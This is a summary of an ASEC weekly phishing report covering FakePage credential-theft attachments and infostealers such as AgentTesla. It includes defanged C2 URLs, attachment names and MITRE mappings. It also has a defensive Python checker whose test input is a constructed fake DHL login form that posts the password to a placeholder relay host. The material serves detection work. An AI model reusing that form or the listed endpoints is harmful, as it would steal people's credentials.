ASEC analyzes phishing email threats from March 5–11, 2023, focusing on attachments and FakePage credential-theft campaigns, with a breakdown of threat types, file extensions, and distribution cases. The post also lists attacker C2 URLs, notable keywords to beware (especially PO-related phrases), and practical user defenses along with MITRE mappings. #FakePage #AgentTesla
Keypoints
- Phishing email attachments were the primary distribution method during the week analyzed.
- FakePage attachments dominated at 84% of observed threats, imitating real login pages to harvest credentials.
- Other malware types included Trojan (7%) and Infostealers (5%) such as AgentTesla and FormBook, with .NET packer VariantCrypter noted for Trojans.
- Additional categories detected: Worm (2%), Exploit (2%), and Downloader (1%).
- File extensions for attachments varied, with HTML/HTM/SHTML used for FakePages and ZIP/RAR/IMG/PDF for other malware.
- Cases included numerous FakePage subjects (e.g., DHL, FedEx, Purchase Orders) and a malware-focused case set, including many Korean-targeted instances.
- Keywords to beware emphasize “PO (Purchase Order)” as a signal to scrutinize emails and attachments.
MITRE Techniques
- [T1598] Phishing for Information – The attacker uses fake login pages to collect credentials by prompting user input. Quoted from the post: ‘leading users to enter their account and password information’.
- [T1566] Phishing – Phishing emails with attachments drive initial access and credential theft. Quoted from the post: ‘phishing emails covered in this post will only be those that have attachments’.
- [T1534] Internal Spearphishing – Internal spearphishing is listed as the lateral-movement technique of the campaign. Quoted from the post: ‘Internal Spearphishing (Lateral Movement, ID:T1534)’.
Indicators of Compromise
- [URL] – FakePage C2 endpoints used to collect submitted credentials and drive further actions: hxxps[:]//experiaevents[.]in/italianpay/next.php, hxxps[:]//formspree[.]io/f/xdovzjlo, and several additional endpoints (e.g., hxxps[:]//submit-form[.]com/OIIpXOTl) and related paths.
- [Domain] – Example domains involved in C2: experiaevents.in, formspree.io, daca.hostedwebsitesystem.com, martinamilligan.co.business.
- [Attachment filename] – Notable attachment names: KYC_HN70(Feb15).one, greatimg.gif.scr, PO_INV 197496 .htm, DHL.zip, sex_action.jpg.scr, and multiple other named files.
- [Subject] – Common subject patterns noted in FakePage cases: DHL | Global | express, New DHL Shipment Document Arrival Notice, Re: PO 1015_INV (Invoice Request).
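The two attachment patterns the report describes, HTML/HTM/SHTML FakePages that post a password field to an external endpoint, and double-extension names such as greatimg.gif.scr, can be triaged with a small mail-gateway check. This is an added example, not code from ASEC or the report; the sample HTML, the relay host forms.example-relay.invalid and the allowed host mail.example.com are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Executable extensions hidden behind a benign-looking inner extension, as in
# the report's greatimg.gif.scr and sex_action.jpg.scr attachment names.
EXEC_EXT = {"scr", "exe", "pif", "com", "bat", "cmd", "js", "vbs"}
DECOY_EXT = {"jpg", "jpeg", "gif", "png", "pdf", "doc", "xls", "txt"}

# Constructed sample of a FakePage-style HTML attachment (not from the report):
# a fake mail login whose form posts the password to a third-party form relay.
SAMPLE_HTML = """<html><body>
<form method="post" action="https://forms.example-relay.invalid/f/abc123">
  <input type="email" name="user" value="victim@example.com">
  <input type="password" name="pass">
  <button>Open DHL shipment document</button>
</form></body></html>"""


class _FormCollector(HTMLParser):
    """Collect every <form action> and note whether a password field exists."""

    def __init__(self):
        super().__init__()
        self.actions, self.asks_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None for bare attributes
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.asks_password = True


def suspicious_filename(name):
    """True for decoy.ext.exec double extensions such as greatimg.gif.scr."""
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-1] in EXEC_EXT and parts[-2] in DECOY_EXT


def scan_html_attachment(html, allowed_hosts=("mail.example.com",)):
    """Return findings for an HTML attachment. A FakePage pairs a password
    field with a form posting to a host the apparent sender does not own."""
    p = _FormCollector()
    p.feed(html)
    hosts = [urlparse(a).hostname for a in p.actions]  # relative actions -> None
    off_domain = [h for h in hosts if h and h.lower() not in allowed_hosts]
    findings = [f"form posts off-domain to {h}" for h in off_domain]
    if p.asks_password and off_domain:
        findings.append("password field submitted to external endpoint")
    return findings
```

Relative form actions (same-origin pages) produce no finding, so a legitimate HTML notification without an external password post passes cleanly.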
Read more: https://asec.ahnlab.com/en/49839/